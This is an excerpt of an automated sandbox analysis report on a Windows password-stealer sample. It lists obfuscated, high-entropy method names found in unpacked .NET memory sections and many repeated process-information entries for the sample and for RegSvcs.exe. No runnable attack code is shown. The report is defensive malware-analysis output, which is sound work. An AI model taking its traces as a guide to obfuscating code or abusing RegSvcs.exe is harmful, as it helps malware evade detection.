Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5890000.6.raw.unpack, V4uC3Iifq56IKQcfry.cs	High entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5890000.6.raw.unpack, vpednoN8EZgsJ4TDwx.cs	High entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, FQ5vVIWSB17NILlySd.cs	High entropy of concatenated method names: 'VTv6cVXAp', 'Hh1EG1MGX', 'c9PSA2Yfs', 'iZ9IqfOtb', 'If6X95jXC', 'Kt0huvhDZ', 'hGMIyPVMysOchB8dEM', 'Ef6qHIcdVw7Ri7Brsq', 'HZvBOAxgt', 'AioOMfSnj'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, lQt3bjCFjySeu10Avr9.cs	High entropy of concatenated method names: 's3N0keKA98', 'cuK0YUkJss', 'Idi06Mx6a8', 'X8s0EUWpn6', 'kaq0UX6ruE', 'Xvb0SDbF4H', 'Kao0IMATGl', 'GgL07isXH7', 'ijF0XZq04X', 'VOc0hbFtUj'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, NOtAo8hDHbV4S980Ea.cs	High entropy of concatenated method names: 'Te5LUf4x1l', 'OpNLIWeVIZ', 'ygF1uQb51L', 'kmO1KC67Yn', 'nI31QOn9Sa', 'r5t12abvYy', 'uv11NuKZDM', 'h601JoAKQ6', 'kJ11ytjYUY', 'eFe1HOqUbP'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, stOlycCWAUXDXt7labi.cs	High entropy of concatenated method names: 'CaFOk07u8V', 'CPROYjspV6', 'f1NO6b5G1I', 'dI4CeTiPvK1pNjrRUot', 'gG5yDkivGVhB2irduij', 'togE97i2npmnDSsmDJX', 'Pl9CQyi8YCVb6LyMjL6'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, x69TvMCoRoUJFd88L0w.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wDcOrJ4PPT', 'cY1Oph0sjt', 'KWUOMChdIl', 'VDtOD6EPgY', 'vifOlooW9P', 'l94ORq6Qhr', 'MNUOcONccG'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, UwQUc8iFGUbE1e0lM9.cs	High entropy of concatenated method names: 'EUuBbqXN2D', 'sfkB832ilw', 'iOoBukinsO', 'aRoBKM3Jfp', 'RWSBrZepnq', 'vMfBQknv44', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, N8PhylRceh4eZBQMYU.cs	High entropy of concatenated method names: 'F905saU2g1', 'DOT5x8DqBp', 'jiyBFmMI5C', 'UxbBC7MW3V', 'u8A5fEFYNT', 'sgF5adnFAE', 'Gfr5eJhqs0', 'SPL5rFnAUZ', 'BVG5pXjZOs', 'Jru5MWkM6r'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, vR30oQGrkAFCk2reXc.cs	High entropy of concatenated method names: 'Dispose', 'w0fCi22h7D', 'F7LW8YvoQh', 'jRixxlrvXR', 'JttCxt68qA', 'yPNCz4nrK3', 'ProcessDialogKey', 'qjlWFwQUc8', 'aGUWCbE1e0', 'UM9WWJKcnQ'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, jjac4rygKOuVBAQDuX.cs	High entropy of concatenated method names: 'EBQvkS8m2d', 'SbFvY9akaQ', 'gJUv6eYmpY', 'Am7vEJWCHK', 'AYJvUwUohj', 'rLHvSFlWyL', 'Pr3vIIY5yU', 'pmpv7r7Sfr', 'HJdvXNo4mT', 'zRGvhshiVk'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, fNgDLlVwKp7yITm1GO.cs	High entropy of concatenated method names: 'hyLCvaBx0C', 'rImC9THXMC', 'BGdCP8ycFK', 'rePCAsyOtA', 'k80CwEau8Y', 'RhKCtl5IMq', 'CN7vSE2lvo2ZMgbxtr', 'QQJx2c8y3NA1UtAXuM', 'JuYCCAYOdm', 'JoNComTPbd'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, KwnJ9o9hiIrcHUfDCG.cs	High entropy of concatenated method names: 'g0eogQUiDZ', 'dXnoqaOgiA', 'iyPoG6Y7FE', 'mLgo1x8sRa', 'CfPoLevAep', 'LfQomfIxtM', 'WUxovioAJ8', 'udbo9jFTrj', 'q43oZ1OTDs', 'WaNoPasiC2'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, MKcnQUxfK4ESKWpHAj.cs	High entropy of concatenated method names: 'YwV0CknXR0', 'iPg0oXxOi6', 'C710VDRxSj', 'BFO0q6cQqI', 'Hox0GecS43', 'oYX0LDhaLA', 'pVh0me5n4l', 'MDABcKR1tk', 'UPLBsvXKxv', 'vBpBiXb2eq'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, H8YrhKbl5IMqi5bCCw.cs	High entropy of concatenated method names: 'Mm3mgJFrZW', 'q4amG4TKVx', 'ILOmLotj3G', 'rc2mvxTOMj', 'qPLm9eiUQV', 'NmvLlsnDyi', 'xMOLRvJscs', 'zGLLccbo4v', 'KcELsqZfug', 'vLsLiKI6Z6'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, YHmp2TMpnj0Ol4bYvB.cs	High entropy of concatenated method names: 'ToString', 'j6ctfTWgF2', 'PW7t8xEVnp', 'HtutuIC2OC', 'sbXtKPbain', 'MCQtQAgkoR', 'm6pt2NPd9s', 'F4OtNO7YXV', 'w4YtJq9qlp', 'HINty1qRnM'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, RVotStDoL1dYM3wrYJ.cs	High entropy of concatenated method names: 'Ld95Pkf7NB', 'AdS5Aa00mN', 'ToString', 'Rnf5qegSUL', 'sOf5GknjsO', 'R9m51ZAqFb', 'Ex65LjZOFB', 'YZQ5mMgHkm', 'poa5vmE7Xl', 'omi59OfWkT'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, ptt68qsAYPN4nrK35j.cs	High entropy of concatenated method names: 'cdCBqs73CA', 'XAlBG4ZmZj', 'wPxB1eLPGh', 'fxgBLc5DTy', 'MiQBmpHAZR', 'o91Bv4BH6K', 'gEQB9MmOhi', 'A0RBZCcZOd', 'T8qBPi566T', 'lsrBAhZWqb'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, XFYg8MeV9E8pqPhPOM.cs	High entropy of concatenated method names: 'gPIT7me1Jk', 'm8UTXYDjDU', 'A7HTbLi1sY', 'YuCT85furc', 'QbjTKCgX7U', 'gRkTQ0ucu3', 'g4oTNDc8wA', 'JlXTJEDkGQ', 'nIqTHWVdK9', 'gO3TfvjW6R'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, YuYPHUXGd8ycFKBePs.cs	High entropy of concatenated method names: 'vx41ErlVXM', 'Xmn1S4Xahu', 'ctP17HIy8v', 'pQY1XiwN9F', 'aKu1wp6ViF', 'na61t8oN2x', 'muI15VcmD0', 'dAZ1Bcs0og', 'Oj810R67Pd', 'YVu1OD1DU8'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, evO3OhNqvdpcTnHPi9.cs	High entropy of concatenated method names: 'AWJvqtPNoi', 'Hvvv1VFIRK', 'mGKvmeXgej', 'lHWmx6kuJa', 'Pw1mz0Blw6', 'jt3vFtBVFI', 'YWFvCZeRdn', 'sbSvWPnTDn', 'LVMvohoPjw', 'kkcvVpAGgX'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, cWqDldrDf5gHB0qqkS.cs	High entropy of concatenated method names: 'MATwHGEqLR', 'vuSwabWukp', 'z0GwrAhZOt', 'Gw6wp9HZO6', 'B0Gw8rZvOO', 'YAfwu27V9e', 'KLUwKekmEd', 'ATWwQiPC7D', 'NCyw2xR54p', 'XUtwNZbGT2'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, iaBx0C70ImTHXMC3jW.cs	High entropy of concatenated method names: 'mhYGrLoUHI', 'nJ4GprFoOW', 'G3bGMgGEwA', 'EIiGD0G5rZ', 'JqVGlZtR3N', 'U9PGR1Ql1r', 'eekGciIDak', 'JI7GsplTkK', 'DpNGirg7Wo', 'YuYGxu1kPh'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, FQ5vVIWSB17NILlySd.cs	High entropy of concatenated method names: 'VTv6cVXAp', 'Hh1EG1MGX', 'c9PSA2Yfs', 'iZ9IqfOtb', 'If6X95jXC', 'Kt0huvhDZ', 'hGMIyPVMysOchB8dEM', 'Ef6qHIcdVw7Ri7Brsq', 'HZvBOAxgt', 'AioOMfSnj'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, lQt3bjCFjySeu10Avr9.cs	High entropy of concatenated method names: 's3N0keKA98', 'cuK0YUkJss', 'Idi06Mx6a8', 'X8s0EUWpn6', 'kaq0UX6ruE', 'Xvb0SDbF4H', 'Kao0IMATGl', 'GgL07isXH7', 'ijF0XZq04X', 'VOc0hbFtUj'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, NOtAo8hDHbV4S980Ea.cs	High entropy of concatenated method names: 'Te5LUf4x1l', 'OpNLIWeVIZ', 'ygF1uQb51L', 'kmO1KC67Yn', 'nI31QOn9Sa', 'r5t12abvYy', 'uv11NuKZDM', 'h601JoAKQ6', 'kJ11ytjYUY', 'eFe1HOqUbP'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, stOlycCWAUXDXt7labi.cs	High entropy of concatenated method names: 'CaFOk07u8V', 'CPROYjspV6', 'f1NO6b5G1I', 'dI4CeTiPvK1pNjrRUot', 'gG5yDkivGVhB2irduij', 'togE97i2npmnDSsmDJX', 'Pl9CQyi8YCVb6LyMjL6'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, x69TvMCoRoUJFd88L0w.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wDcOrJ4PPT', 'cY1Oph0sjt', 'KWUOMChdIl', 'VDtOD6EPgY', 'vifOlooW9P', 'l94ORq6Qhr', 'MNUOcONccG'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, UwQUc8iFGUbE1e0lM9.cs	High entropy of concatenated method names: 'EUuBbqXN2D', 'sfkB832ilw', 'iOoBukinsO', 'aRoBKM3Jfp', 'RWSBrZepnq', 'vMfBQknv44', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, N8PhylRceh4eZBQMYU.cs	High entropy of concatenated method names: 'F905saU2g1', 'DOT5x8DqBp', 'jiyBFmMI5C', 'UxbBC7MW3V', 'u8A5fEFYNT', 'sgF5adnFAE', 'Gfr5eJhqs0', 'SPL5rFnAUZ', 'BVG5pXjZOs', 'Jru5MWkM6r'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, vR30oQGrkAFCk2reXc.cs	High entropy of concatenated method names: 'Dispose', 'w0fCi22h7D', 'F7LW8YvoQh', 'jRixxlrvXR', 'JttCxt68qA', 'yPNCz4nrK3', 'ProcessDialogKey', 'qjlWFwQUc8', 'aGUWCbE1e0', 'UM9WWJKcnQ'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, jjac4rygKOuVBAQDuX.cs	High entropy of concatenated method names: 'EBQvkS8m2d', 'SbFvY9akaQ', 'gJUv6eYmpY', 'Am7vEJWCHK', 'AYJvUwUohj', 'rLHvSFlWyL', 'Pr3vIIY5yU', 'pmpv7r7Sfr', 'HJdvXNo4mT', 'zRGvhshiVk'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, fNgDLlVwKp7yITm1GO.cs	High entropy of concatenated method names: 'hyLCvaBx0C', 'rImC9THXMC', 'BGdCP8ycFK', 'rePCAsyOtA', 'k80CwEau8Y', 'RhKCtl5IMq', 'CN7vSE2lvo2ZMgbxtr', 'QQJx2c8y3NA1UtAXuM', 'JuYCCAYOdm', 'JoNComTPbd'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, KwnJ9o9hiIrcHUfDCG.cs	High entropy of concatenated method names: 'g0eogQUiDZ', 'dXnoqaOgiA', 'iyPoG6Y7FE', 'mLgo1x8sRa', 'CfPoLevAep', 'LfQomfIxtM', 'WUxovioAJ8', 'udbo9jFTrj', 'q43oZ1OTDs', 'WaNoPasiC2'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, MKcnQUxfK4ESKWpHAj.cs	High entropy of concatenated method names: 'YwV0CknXR0', 'iPg0oXxOi6', 'C710VDRxSj', 'BFO0q6cQqI', 'Hox0GecS43', 'oYX0LDhaLA', 'pVh0me5n4l', 'MDABcKR1tk', 'UPLBsvXKxv', 'vBpBiXb2eq'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, H8YrhKbl5IMqi5bCCw.cs	High entropy of concatenated method names: 'Mm3mgJFrZW', 'q4amG4TKVx', 'ILOmLotj3G', 'rc2mvxTOMj', 'qPLm9eiUQV', 'NmvLlsnDyi', 'xMOLRvJscs', 'zGLLccbo4v', 'KcELsqZfug', 'vLsLiKI6Z6'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, YHmp2TMpnj0Ol4bYvB.cs	High entropy of concatenated method names: 'ToString', 'j6ctfTWgF2', 'PW7t8xEVnp', 'HtutuIC2OC', 'sbXtKPbain', 'MCQtQAgkoR', 'm6pt2NPd9s', 'F4OtNO7YXV', 'w4YtJq9qlp', 'HINty1qRnM'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, RVotStDoL1dYM3wrYJ.cs	High entropy of concatenated method names: 'Ld95Pkf7NB', 'AdS5Aa00mN', 'ToString', 'Rnf5qegSUL', 'sOf5GknjsO', 'R9m51ZAqFb', 'Ex65LjZOFB', 'YZQ5mMgHkm', 'poa5vmE7Xl', 'omi59OfWkT'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, ptt68qsAYPN4nrK35j.cs	High entropy of concatenated method names: 'cdCBqs73CA', 'XAlBG4ZmZj', 'wPxB1eLPGh', 'fxgBLc5DTy', 'MiQBmpHAZR', 'o91Bv4BH6K', 'gEQB9MmOhi', 'A0RBZCcZOd', 'T8qBPi566T', 'lsrBAhZWqb'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, XFYg8MeV9E8pqPhPOM.cs	High entropy of concatenated method names: 'gPIT7me1Jk', 'm8UTXYDjDU', 'A7HTbLi1sY', 'YuCT85furc', 'QbjTKCgX7U', 'gRkTQ0ucu3', 'g4oTNDc8wA', 'JlXTJEDkGQ', 'nIqTHWVdK9', 'gO3TfvjW6R'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, YuYPHUXGd8ycFKBePs.cs	High entropy of concatenated method names: 'vx41ErlVXM', 'Xmn1S4Xahu', 'ctP17HIy8v', 'pQY1XiwN9F', 'aKu1wp6ViF', 'na61t8oN2x', 'muI15VcmD0', 'dAZ1Bcs0og', 'Oj810R67Pd', 'YVu1OD1DU8'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, evO3OhNqvdpcTnHPi9.cs	High entropy of concatenated method names: 'AWJvqtPNoi', 'Hvvv1VFIRK', 'mGKvmeXgej', 'lHWmx6kuJa', 'Pw1mz0Blw6', 'jt3vFtBVFI', 'YWFvCZeRdn', 'sbSvWPnTDn', 'LVMvohoPjw', 'kkcvVpAGgX'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, cWqDldrDf5gHB0qqkS.cs	High entropy of concatenated method names: 'MATwHGEqLR', 'vuSwabWukp', 'z0GwrAhZOt', 'Gw6wp9HZO6', 'B0Gw8rZvOO', 'YAfwu27V9e', 'KLUwKekmEd', 'ATWwQiPC7D', 'NCyw2xR54p', 'XUtwNZbGT2'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, iaBx0C70ImTHXMC3jW.cs	High entropy of concatenated method names: 'mhYGrLoUHI', 'nJ4GprFoOW', 'G3bGMgGEwA', 'EIiGD0G5rZ', 'JqVGlZtR3N', 'U9PGR1Ql1r', 'eekGciIDak', 'JI7GsplTkK', 'DpNGirg7Wo', 'YuYGxu1kPh'

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
